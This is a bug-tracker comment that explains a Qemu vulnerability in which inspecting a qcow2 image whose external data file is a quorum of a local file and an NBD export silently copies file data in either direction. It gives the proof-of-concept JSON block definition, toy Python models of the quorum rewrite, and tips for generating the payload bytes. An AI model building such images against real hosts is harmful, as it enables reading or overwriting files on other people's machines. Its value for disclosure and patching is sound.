Comment 50 for bug 2059809

Martin Kaesberger (mkaesberger) wrote: Re: Arbitrary file access through QCOW2 external data file

Actually, Qemu behaves as intended, and changing that behavior is likely to be difficult. Access normally looks like this:

qcow2 ───> file

Qemu initializes the Qcow2 driver, which reads and writes from a file. The info command does not initiate a write operation, but only outputs the settings/properties and closes the driver again.
If a data file is used, only the metadata are read from the file and the accesses to guest clusters are passed on to the data file. I have set up the following chain in the proof of concept:

qcow2 ┬─x file
      │                      ┌──> raw ──> file
      └──> qcow2 ───> quorum ┤
                             └──> raw ──> nbd

The formatted definition looks like this:
{
    "driver": "qcow2",
    "read-only": false,
    "file": {
        "driver": "quorum",
        "read-only": false,
        "rewrite-corrupted": true,
        "read-pattern": "quorum",
        "vote-threshold": 1,
        "children": [
            {
                "driver": "raw",
                "read-only": false,
                "file": {
                    "filename": "file-1.raw"
                }
            },
            {
                "driver": "raw",
                "file": {
                    "driver": "nbd",
                    "host": "localhost",
                    "port": 1234,
                    "export": "data"
                }
            }
        ]
    }
}
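
To check that a nested definition like this really describes the intended tree, it can help to walk it programmatically. The following is only a minimal sketch: the helper name `chains` is hypothetical, the definition is abbreviated to the keys that shape the tree, and a node without an explicit `driver` is simply labelled by its `filename`.

```python
import json

# The definition from above, reduced to the keys that determine the tree shape.
DEFINITION = json.loads("""
{
  "driver": "qcow2",
  "file": {
    "driver": "quorum",
    "children": [
      {"driver": "raw", "file": {"filename": "file-1.raw"}},
      {"driver": "raw", "file": {"driver": "nbd", "host": "localhost",
                                 "port": 1234, "export": "data"}}
    ]
  }
}
""")


def chains(node):
    """Return every root-to-leaf chain of driver names in a nested definition."""
    # A node without an explicit driver is labelled by its filename instead.
    name = node.get("driver") or node.get("filename", "?")
    kids = []
    if isinstance(node.get("file"), dict):
        kids.append(node["file"])
    kids.extend(node.get("children", []))
    if not kids:
        return [[name]]
    return [[name] + tail for kid in kids for tail in chains(kid)]


for chain in chains(DEFINITION):
    print(" -> ".join(chain))
# prints:
# qcow2 -> quorum -> raw -> file-1.raw
# qcow2 -> quorum -> raw -> nbd
```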

A Qcow2 driver is initialized as the data file, but its source is a quorum rather than a file. The quorum has two important properties: 1) `read-pattern: quorum` ensures that all children are read and that a majority decision is made on which data are correct. 2) `rewrite-corrupted: true` ensures that incorrect data are corrected. Because the Qcow2 driver has to read the header for initialization, both children are read, and they differ because the content of one is not known when the other is prepared. The quorum therefore initiates a correction of the "incorrect" data. With two children, this results in the data being transferred from the second child to the first. With more children, the outcome should follow the majority.

In the proof of concept, I used two raw devices, one backed by a file and one backed by an NBD driver. Depending on the order of the children, data are either written from the NBD device to the file or transferred from the file to the NBD device. All of this happens merely because the driver is initialized in order to introspect the image file.
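
The effect can be illustrated with a toy model. This is not Qemu's implementation, only a sketch of the behavior described above: the function `quorum_read` and the in-memory "children" are hypothetical, and the tie-break (the later child wins when two children disagree) is an assumption taken from the two-child observation in this comment.

```python
from collections import Counter


def quorum_read(children, vote_threshold=1, rewrite_corrupted=True):
    """Toy quorum read: vote on the children's contents, optionally repair losers.

    children is a list of bytearray objects standing in for block devices.
    Returns the winning data and the indices of the children that were rewritten.
    """
    votes = Counter(bytes(child) for child in children)
    best = max(votes.values())
    if best < vote_threshold:
        raise IOError("quorum not reached")
    # Assumption: on a tie, the version held by the later child wins.
    winner = next(bytes(c) for c in reversed(children) if votes[bytes(c)] == best)
    rewritten = []
    if rewrite_corrupted:
        for index, child in enumerate(children):
            if bytes(child) != winner:
                child[:] = winner  # the "correction" is a write to that child
                rewritten.append(index)
    return winner, rewritten


# A read that only wants to inspect the header still overwrites the first child.
local_file = bytearray(b"local file content")
nbd_export = bytearray(b"data served by nbd")
data, rewritten = quorum_read([local_file, nbd_export])
print(rewritten, bytes(local_file))
```

Swapping the order of the two children in the list reverses the direction of the copy, which mirrors the file-to-NBD case.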

Arnaud Morin: Whoops, I used an extension to the POSIX standard to generate the binary data. `printf "\x04"` doesn't work in dash, so the escape sequences end up in multiple locations in the file. Either generate the file in a BusyBox/Alpine-based container or use bash instead.
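
Another way to sidestep shell differences is to write the bytes without a shell at all. The sketch below is only an illustration: the helper `write_binary`, the file name `example.bin`, and the one-byte payload are placeholders and not the actual contents of the proof of concept.

```python
import tempfile
from pathlib import Path


def write_binary(path, data):
    """Write raw bytes to path and return the number of bytes written."""
    return Path(path).write_bytes(data)


# Placeholder payload: the single byte 0x04 that `printf "\x04"` was meant to emit.
payload = bytes([0x04])

with tempfile.TemporaryDirectory() as tmp:
    target = Path(tmp) / "example.bin"  # hypothetical file name
    written = write_binary(target, payload)
    readback = target.read_bytes()

print(written, readback)
```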

The attempt should have succeeded if you see the message `Image is not in qcow2 format`.